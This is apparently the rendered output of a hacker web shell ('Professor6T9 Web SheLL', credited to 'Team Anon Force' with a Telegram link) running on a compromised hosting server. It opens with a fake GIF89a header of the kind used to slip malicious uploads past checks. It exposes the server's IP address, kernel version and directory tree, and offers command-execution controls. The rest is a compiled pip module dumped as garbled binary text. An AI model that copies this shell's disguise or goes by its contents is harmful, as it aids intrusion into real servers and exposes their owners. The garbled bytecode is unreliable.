GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux premium22.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
68.65.122.106
/
opt
/
alt
/
python311
/
lib
/
python3.11
/
site-packages
/
pip
/
_internal
/
commands
/
__pycache__
[ HOME ]
Exec
Submit
File Name : cache.cpython-311.pyc
� �Red � � � d dl Z d dlZd dlmZ d dlmZmZ d dlmc m c m Z d dlmZ d dl mZmZ d dlmZmZ d dlmZ ee� � Z G d� d e� � ZdS ) � N)�Values)�Any�List)�Command)�ERROR�SUCCESS)�CommandError�PipError)� getLoggerc �j � e Zd ZdZdZdZdd�Zdedee de fd �Zdedee ddfd �Z dedee ddfd�Zdedee ddfd�Zd ee ddfd�Zd ee ddfd�Zdedee ddfd�Zdedee ddfd�Zdede de fd�Zdedee fd�Zdede dee fd�ZdS )�CacheCommandaw Inspect and manage pip's wheel cache. Subcommands: - dir: Show the cache directory. - info: Show information about the cache. - list: List filenames of packages stored in the cache. - remove: Remove one or more package from the cache. - purge: Remove all items from the cache. ``<pattern>`` can be a glob expression or a package name. Tz� %prog dir %prog info %prog list [<pattern>] [--format=[human, abspath]] %prog remove <pattern> %prog purge �returnNc � � | j � dddddd�� � | j � d| j � � d S ) Nz--format�store�list_format�human)r �abspathz:Select the output format among: human (default) or abspath)�action�dest�default�choices�helpr )�cmd_opts� add_option�parser�insert_option_group)�selfs ��/builddir/build/BUILDROOT/alt-python311-pip-21.3.1-3.el8.x86_64/opt/alt/python311/lib/python3.11/site-packages/pip/_internal/commands/cache.py�add_optionszCacheCommand.add_options'